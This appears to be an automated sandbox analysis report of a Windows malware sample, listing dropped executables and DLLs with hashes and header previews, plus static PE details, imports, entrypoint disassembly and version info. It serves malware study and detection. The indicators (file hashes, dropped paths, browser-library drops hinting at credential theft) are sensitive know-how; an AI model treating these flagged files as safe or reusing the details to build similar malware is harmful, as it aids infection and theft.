SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\mozglue[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\softokn3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\E61.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1AB6.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3238840
Entropy (8bit):	7.865140899006048
Encrypted:	false
SSDEEP:	49152:s0jllSZDgpa/IkggmZW+GDlUbT5e3XVs2P7JnbUdLd27EjQvAPP:/lEOalV6aabNe3XVxP5b+47oQv0P
MD5:	9AA6DD10E0BFB49BAA17F04F44B9DCD3
SHA1:	09AD5A6AE8A6396E7BDF783CD124417CD7515C7A
SHA-256:	A07CF8A0E1FADC8AB20DBE35341F1FEBB3A0B2E42C8F5991C0CC397B130D7621
SHA-512:	601F36F703EE396DBA325349AA25440270C1CEE6E069146C1ED7F03E96FE5FC30DEAD138E7F3B713549B815635E64AA97A10054E71A415690E622C417BBFBB4D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........................&......P.P.. ... ....@.. .......................@\|.....".1...@.................................:...P.....z.............^1..............................................................................................text........ ...................... ..`.sdata....... ......................@... .....@......................@..@.reloc.......`......................@..@.idata... ..........................@...\| ..............................`..`.themida..G..@......................`....boot....d.. P..d..J..............`..`.rsrc........z......./.............@..@........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1EB.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.000383259800236
Encrypted:	false
SSDEEP:	96:wpMyid82EdNqPXX9vO2wiEz7pc7vEroIQ9dNcfKdroIZdNg5sZroI7DNgsFlZgN+:w2d82Edwftwi+pAe45D4mdlMiY
MD5:	A69E12607D01237460808FA1709E5E86
SHA1:	4A12F82AEE1C90E70CDF6BE863CE1A749C8AE411
SHA-256:	188E05EFB42C1F7FDB5C910A6614F710A87AE642B23AC9FFE3F75246744865BC
SHA-512:	7533E6DA6BAC0405FC8B608DA8020B54B6EE02592E6FD40EA342E130A8A876AE5EF4A1FD636D95E76339DBF8BE45CECBD22CA2D0A4635B055FFAFEC3D7E15284
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...........6......5.....t5.....Rich.*..................PE..L.....:].................0... ......x........@....@..........................`.......b......................................T...(....P..\|...................................................................0... ....................................text...P".......0.................. ..`.data........@.......@..............@....rsrc...\|....P.......P..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2612.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2683320
Entropy (8bit):	7.7960814202992195
Encrypted:	false
SSDEEP:	49152:R1K/3IYw7UmBKvSdYxwR+hDxS+7ep+ur6IURKvb1U0SDtFXn2wcklNy:R1o3ItvIKe+ANQZlWKv20SpFX2vklNy
MD5:	59C5BECF1794C98CBE8DA8E501F55DA5
SHA1:	E6CE9BB8AC54CC504F93E8DBA8632D09D653D986
SHA-256:	DD0C4B523A427F5E2EA23D010D114E7FE32392768ED0E43C0B61DE0D5584AE17
SHA-512:	3E23F98583E71E79F511B32B8281ABE72AAE426111929DE195CA4F8949B9CF169E0D74FD2EEBF91E92B323CC3E8DE3FAD55CA370FC2694F1BC2A9FFC8E4E7455
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G......................."........D.. ... ....@.. ....................... g.....S.)...@.................................:...P.....e.#.............(..............................................................................................text........ ...................... ..`.sdata....... ......................@... 8....@......................@..@.reloc.......`......................@..@.idata... ..........................@...\| ..............................`..`.themida.`;..@......................`....boot.....!...C...!..n..............`..`.rsrc...#.....e......8'.............@..@........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\40A0.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	169472
Entropy (8bit):	6.867437993754569
Encrypted:	false
SSDEEP:	3072:pH3gKkQv1J3aQoGNMas8lcHj2HzKY5khZdveGJQKt:pg8frNBsbJndv3
MD5:	DF744C31B1D8DE9790059D2BAC52E2EF
SHA1:	A06AB6C3DA4602B6C66E35C61CE448F9C981135D
SHA-256:	B5FC60D22C6FB2E13B910FCBB8D196516CA98137054E27411B31CB92400A380A
SHA-512:	7CD6E2FB520475C3B96FEFD276FBBC2117480B5AD7EAE91FED9A9C8A52535F4912628A5FD92413B51BF9D5488C97181BFE622A8B4C3BC063AD7664EC61BDF1D8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....O.^.................P...z.......$.......`....@.................................................................0...Q......<....................................a...................... }.......\|..@............`...............................text...1O.......P.................. ..`.rdata...@...`...B...T..............@..@.data...8.......:..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\49B.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439296
Entropy (8bit):	7.704587837190729
Encrypted:	false
SSDEEP:	6144:SpYoqzhV+WTyOy9w6auup9o44zi77Gmx36wcHoNhQ5InUGqkVTPbD+bIzZ1ZsWzo:S2dhV+j2z9o448FLQAlDbtso2
MD5:	C633B1E68DCFFDAE991C3F2D2D4FFFA5
SHA1:	A1ED4D1100C46B6FBC64026B5114FB568812B340
SHA-256:	CD2C1DEDBC8879403936CE9F750EED4ACC6C2422088C7180377C88C58AD1226C
SHA-512:	AF84435137376603E9865C4E7E5FA742649127E17B4DE8B84F50C586890895BC5AEB208E7AE398C40C767D5DBD435A69E2214CF1130BD8D2E377CE52B6608254
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......_.................n...z.......$............@.................................................................0...Q......<.......................................................... ..........@............................................text....l.......n.................. ..`.rdata...@.......B...r..............@..@.data...8.......:..................@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\876504d2-be03-42d9-b2f9-6ed891d3a9d2\ .dll Download File
Process:	C:\Users\user\AppData\Local\Temp\B72.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	145173
Entropy (8bit):	6.364932145314629
Encrypted:	false
SSDEEP:	3072:2vHGxvpTI1xUSnsEYVA+9yaJAUiXbNxqAmi3zGDm/8S:mmwWmrtPTj9jGq/8S
MD5:	E8641F344213CA05D8B5264B5F4E2DEE
SHA1:	96729E31F9B805800B2248FD22A4B53E226C8309
SHA-256:	85E82B9E9200E798E8F434459EACEE03ED9818CC6C9A513FE083E72D48884E24
SHA-512:	3130F32C100ECB97083AD8AC4C67863E9CEED3A9B06FC464D1AEEAEC389F74C8BF56F4CE04F6450FD2CC0FA861D085101C433CFA4BEC3095F8EBEEB53B739109
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=.6.\.e.\.e.\.e.%e.\.e.$.e.\.e.\.e.\.e..e.\.e...e.\.e..%e.\.e...e.\.e...e.\.e...e.\.eRich.\.e........................PE..d.....v\.........." .........0......P................................................9....@.............................................s.......x....@.......0...............P..........................................p.......................`....................text............................... ..`.rdata..............................@..@.data...X.... ......................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc...!...P...!..................`...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B72.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	542208
Entropy (8bit):	7.728739568256964
Encrypted:	false
SSDEEP:	12288:EVklBY4cFhfU+rFDAGOmw8E5X4TnBhsaMJcR/V:EVklBRcrf/FDAGOmSunBhsId
MD5:	68D5331A8418C4089BB7C0F524C77728
SHA1:	9FF36FB8F4132B44AF8483BF6CA8CE82B9BE8236
SHA-256:	6004220AA5D81F1B80C49CA0E18F8332292AE4E2B09898469C04CF96460359B1
SHA-512:	BA859C3D25A4BF4C321E9869F147800C6767AE9B51CF145317F83EB25D7D66ADFEDAAFB668A312B9FFD15F05F076EFE309ABF11F7BE21CD1FFD5B7920B797A2F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......B.......4... ........@.. ....................................@..................................3..W....@..X..........................04............................................... ............... ..H............text........ ...................... ..`.rsrc...X...@...,..................@..@.reloc...............D..............@..B.................3......H.......0_..$F...............V..........................................\./.?.@.#.:.[.]...............9.........t.+...$61l.....y]4.....&.[c.%j.$._T.^..z.....M.'.....,k..7L.3..\....5...:.vV@..<..0...........(.................4....0.....................UU..4....0.........................4....0.....................77..4....0.....................77..4....0.....................77..4....0.....................77..4....0.........................4....0..........*...A.......

C:\Users\user\AppData\Local\Temp\E61.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	624640
Entropy (8bit):	7.668662071231235
Encrypted:	false
SSDEEP:	12288:3VYXfoXc/96ZuQa+OfbgtNTd4R/Ke/8x/TYNNs4FhWAcxPhdp/:woXcd+Y2EBK+8xs0XAcxLp/
MD5:	BF40705CBA9708182B61956985895005
SHA1:	174C659E0D225B1EA0EB5A7E8D30911D17AD06A4
SHA-256:	6325C9FFBEDD8D4A4D676D6DC5E790E6D99A65F1E3C621DF7EC275AB7B047565
SHA-512:	F01C4764675238503776B00B0B72E0727C531908499043B4043029F495DC2F8C19DB281C98EC00FDC74E5A67ECFBC7F04A2C10FEFB0BA03E5D28B9D8DE292600
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&..zb..)b..)b..)\|.')...)\|.1).)\|.6)Z..)Em.)e..)b..).)\|.8)c..)\|.&)c..)\|.#)c..)Richb..)........PE..L...@9[^.................L...................`....@.......................... ......Cr......................................,...P.......`5..........................`b..................................@............`...............................text....K.......L.................. ..`.rdata.......`.......P..............@..@.data...\|........R..................@....rsrc...`5.......6...R..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ahvuwsh Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	321226
Entropy (8bit):	7.999402092644742
Encrypted:	true
SSDEEP:	6144:tSdHu+aK5qFXUT61qCA50GNhbBcjihREmGVR7cSoLLD5Cg:tQpb5EX6+SNvck7LL3
MD5:	A6CCE0629A9E2BCD9C8B8C61E8FC3F74
SHA1:	A46A37F0AD36735098D2926F7970A88865D8754D
SHA-256:	6E02DACD0C6650A0E79CA73749CFFFBA0DAD432F3BDA4B80582D572E2ABEC7C6
SHA-512:	71301C6F34256886C1563D9CF5F57F8F3F8A4F94B39DBA8D1365CC42722BCD5C5DDD0A5BD85969E58CEE5374AF900F2BDC87378E1F0765E86EC64AA9BDDBDB1A
Malicious:	false
Reputation:	unknown
Preview:	..r"....v.....t.....em.+.C...{#G..m..65.........`\|.2CT...6.1).vJ^.3h)N. ...\|.&X./-#...I....n.....N...p...+^..5.el.V.{<...=..uI...Yt.X.u..A..^..,.:.Zu.G..8..c..._.P..'.......EC...8t..(..P.%...k.)x........:..:.Y........?ym...]0.:.P.>,..Sg.dh&...o.S...+.i.i..J{aR_.g.iDW.?#&..$.t.)H..Zq=......N0.e.. ."...cE.41E..\|.&Jy....!...d.........JJ.8.<a..c..h.{m.B..<]0....kCR.....7.j..m.3..b..o.6.@^..'.A-..pM.......hbY`..W.2....n..6......)`.D.y>s.\|..M;.3.XP.)T...2.....~..k=....2k..+.U,..._...s....)._.d@..G.\|.CM/~.M...$.h{z.i{7.$..D%^.pV..C.r....+.W4.W=....aA.v..\........2..%........Z...ML..%%\|....."[.\.;%hg.v..#... t...5..".o.B7..&r..W......3...%.......kho..X.{}..+..SN.$.&J..n...O#J;.+...8..\.!..@I......Z......-y.........2.1...t.`..&.6Xf9B.....2R..........$tIZx....#]V.od..v..E&.>....i.`5....=1.Ky.x.RQ...;... K..{.#.tn.....g.a......u.w3f.(..S..:.M.*#.L....nn.......[AH........D./A...b.([.{"i.u../........r..\|...m.7..rg.p.$&.....[&.?.cID..;.Z

C:\Users\user\AppData\Roaming\hhiwwui Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	153088
Entropy (8bit):	6.693018453295646
Encrypted:	false
SSDEEP:	1536:mhIZu/M//YQ7kv+v3eCb5rKokmJ8skGmgv4JAZlfhx5HHpQ6dIvpGaJATEL+hIty:euYQpvJ5+4kQZlfhx5HJl4QaJQKt
MD5:	25390347B76AF239FD1016A2B090CA89
SHA1:	3DFAC63F469EA0BE1D235FC5D7A1F33B53D56B54
SHA-256:	C55DF5E9D0EA176321A29F8957C7A43188796AE0FC0FFE1AE94AD6092D30BA77
SHA-512:	C050819B3A1B93E3AECD0AAD0B4C07F75517EC3A48DC5A4188559BA5939E2162CBEFCAD25DEFD90C6D4075982B527B97621B820BCAE8393808F3B175D7F6CEED
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....p_.....................z.......$....... ....@..........................@.......e..............................._..R....U..<....p...............................!.......................<.......<..@............ ...............................text............................... ..`.rdata..2@... ...B..................@..@.data...8...p...:...V..............@....rsrc........p......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hhiwwui:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.693018453295646
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	GzsKHwvBmG.exe
File size:	153088
MD5:	25390347b76af239fd1016a2b090ca89
SHA1:	3dfac63f469ea0be1d235fc5d7a1f33b53d56b54
SHA256:	c55df5e9d0ea176321a29f8957c7a43188796ae0fc0ffe1ae94ad6092d30ba77
SHA512:	c050819b3a1b93e3aecd0aad0b4c07f75517ec3a48dc5a4188559ba5939e2162cbefcad25defd90c6d4075982b527b97621b820bcae8393808f3b175d7f6ceed
SSDEEP:	1536:mhIZu/M//YQ7kv+v3eCb5rKokmJ8skGmgv4JAZlfhx5HHpQ6dIvpGaJATEL+hIty:euYQpvJ5+4kQZlfhx5HJl4QaJQKt
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....p_...

File Icon


Icon Hash:	8c8cfcccce888ae7

Static PE Info

General
Entrypoint:	0x402413
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5F70CD2E [Sun Sep 27 17:34:38 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7f519e58768c36b2651aa4c0b9c28c9d

Entrypoint Preview

Instruction
call 00007FBFF4D5E44Ah
jmp 00007FBFF4D5AC7Dh
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007FBFF4D5AE26h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007FBFF4D5AE50h
test ecx, 00000003h
jne 00007FBFF4D5ADF1h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007FBFF4D5ADEAh
mov eax, dword ptr [ecx-04h]
test al, al
je 00007FBFF4D5AE34h
test ah, ah
je 00007FBFF4D5AE26h
test eax, 00FF0000h
je 00007FBFF4D5AE15h
test eax, FF000000h
je 00007FBFF4D5AE04h
jmp 00007FBFF4D5ADCFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0041229Ch
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FBFF4D5AE0Eh
test byte ptr [eax], 00000008h
je 00007FBFF4D5AE09h
mov dword ptr [ebp+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x15fe0	0x52	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x155a0	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28a7000	0xc5d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x121f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x13cd0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13c88	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12000	0x1b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10fc1	0x11000	False	0.814883961397	data	7.58442645787	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x12000	0x4032	0x4200	False	0.280066287879	data	4.3718974655	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x288f238	0x3a00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x28a7000	0xc5d8	0xc600	False	0.713462752525	data	6.69100375468	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x28a74f0	0xea8	data	English	Zimbabwe
RT_ICON	0x28a8398	0x8a8	data	English	Zimbabwe
RT_ICON	0x28a8c40	0x568	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_ICON	0x28a91a8	0x25a8	dBase III DBT, version number 0, next free block index 40	English	Zimbabwe
RT_ICON	0x28ab750	0x10a8	data	English	Zimbabwe
RT_ICON	0x28ac7f8	0x468	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_ICON	0x28accc0	0xea8	data	English	Zimbabwe
RT_ICON	0x28adb68	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 13469504, next used block 1444880	English	Zimbabwe
RT_ICON	0x28ae410	0x568	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_ICON	0x28ae978	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 334423236, next used block 300607925	English	Zimbabwe
RT_ICON	0x28b0f20	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 328944178, next used block 11745314	English	Zimbabwe
RT_ICON	0x28b1fc8	0x988	data	English	Zimbabwe
RT_ICON	0x28b2950	0x468	GLS_BINARY_LSB_FIRST	English	Zimbabwe
RT_STRING	0x28b3048	0x246	data	English	Zimbabwe
RT_STRING	0x28b3290	0x342	data	English	Zimbabwe
RT_ACCELERATOR	0x28b2e20	0x30	data	English	Zimbabwe
RT_GROUP_ICON	0x28acc60	0x5a	data	English	Zimbabwe
RT_GROUP_ICON	0x28b2db8	0x68	data	English	Zimbabwe
RT_VERSION	0x28b2e90	0x1b4	data
None	0x28b2e60	0xa	data
None	0x28b2e50	0xa	data
None	0x28b2e70	0xa	data
None	0x28b2e80	0xa	data

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasesLengthW, WriteConsoleOutputCharacterA, BuildCommDCBAndTimeoutsA, WriteConsoleOutputW, EndUpdateResourceW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, WaitForSingleObject, GetSystemDefaultLCID, GetModuleHandleW, EnumCalendarInfoExW, SetThreadUILanguage, GetConsoleAliasesLengthA, GetConsoleTitleA, GetEnvironmentStrings, GetConsoleCP, ReadConsoleInputA, SetVolumeMountPointA, lstrcpynW, SetConsoleCursorPosition, GetFileAttributesW, SetTimeZoneInformation, WriteConsoleW, IsBadWritePtr, GetMailslotInfo, lstrcatA, lstrlenW, FlushFileBuffers, InterlockedExchange, FillConsoleOutputCharacterW, ChangeTimerQueueTimer, SetLastError, GetProcAddress, PeekConsoleInputW, EnumDateFormatsExA, CreateTimerQueueTimer, LocalLock, EnterCriticalSection, GlobalGetAtomNameA, ResetEvent, GetLocalTime, LocalAlloc, SetConsoleOutputCP, SetFileApisToANSI, GetOEMCP, GetModuleHandleA, HeapSetInformation, GetCPInfoExA, FindFirstVolumeA, DeleteTimerQueueTimer, GetCurrentProcessId, GetConsoleProcessList, GetModuleFileNameW, GetSystemDefaultLangID, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, Sleep, ExitProcess, GetLastError, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LoadLibraryA, InitializeCriticalSectionAndSpinCount, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW

USER32.dll

GetAltTabInfoW

Exports

Name	Ordinal	Address
@SetFirstEverVice@8	1	0x401065

Version Infos

Description	Data
InternalName	sagzmioloke.awi
ProductVersion	7.59.22.123
Copyright	Copyrighz (C) 2021, fudkageta
Translation	0x0123 0x003a

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Zimbabwe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
